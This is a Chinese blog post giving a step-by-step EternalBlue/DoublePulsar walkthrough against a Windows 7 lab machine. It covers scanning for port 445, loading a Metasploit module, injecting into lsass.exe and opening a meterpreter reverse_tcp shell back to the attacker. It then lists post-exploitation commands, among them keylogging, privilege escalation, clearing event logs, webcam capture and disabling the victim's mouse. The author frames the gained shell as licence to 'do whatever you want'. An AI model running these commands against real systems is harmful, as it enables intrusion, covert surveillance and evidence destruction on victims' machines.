永恒之蓝

Eternalblue

攻击鸡:kali2.0
ip:192.168.123.73
目标鸡:win7
ip:192.168.123.237

先安装wine

apt-get install wine

安装完成后执行

wine cmd.exe

然后exit

wine

我们要寻找到开启445端口的目标:
指定一个网段:

namp -sS -p 445 192.168.123.1/24

看人品,基本都修复了,我用虚拟机测试。

git 克隆我们需要的脚本

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

将其放到msf框架的目录里面,这里我选择 /usr/share/metasploit-framework/modules/exploits/windows/smb 这个目录

先进入Eternalblue-Doublepulsar-Metasploit/

然后copy一下

cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

开启数据库

/etc/init.d/postgresql start

ps:/etc/init.d/这个目录包含许多各种服务的启动和停止脚本,详解请Google

启动msf,搜索我们的脚本

search eternalblue_doublepulsar

msf

接下来执行下面的命令

use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set rhost 192.168.123.237
show targets
set targets 8
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.123.73
run

wing

wing

wing

wing

wing

wing

wing

wing

操作无误的话,由上图可以看到,已经得到shell,然后,就可以–为所欲为-为所欲为-为所欲为….

下面附上一些得到shell后的常用命令

sessions -l 用于查看你控制的电脑

你要控制哪台就输入哪台的id:meterpreter >sessions -i 1
开始键盘记录:

meterpreter > keyscan_start

显示网络信息:

meterpreter > ipconfig

查看服务器运行

meterpreter > getuid

显示系统信息

meterpreter >sysinfo

查看进程列表

meterpreter > ps

进入目标电脑

meterpreter > shell

自动提权

meterpreter > getsystem

请除日志

`meterpreter > clearev``

关机
meterpreter > shutdown

截屏
meterpreter >screenshot

摄像头列表

meterpreter > webcam_list

打开摄像头

meterpreter > webcam_snap

禁止目标使用鼠标

meterpreter > uictl disable mouse

启用目标使用键盘

meterpreter > uictl enable keyboard

未完待续!


   转载规则


《永恒之蓝》 Wing 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
定风波 定风波
十里洋场 成就一生功业潮起潮落 里里外外都体面你陪了我多少年穿林打叶 过程轰轰烈烈花开花落 一路上起起跌跌春夏秋冬泯和灭幕还未谢好不容易又一年渴望的你竟还没有出现假如成功就在目前为何还有不敢实践的诺言一辈子忠肝义胆薄云天撑起那风起云涌的
2017-05-19
下一篇 
python切片 python切片
0X00 list切片 倒序切片 字符串切片 0X01 list切片假设这里有一个list>>>L=['wing','sunny','fancy']需要取前两个元素&g
2017-05-13
  目录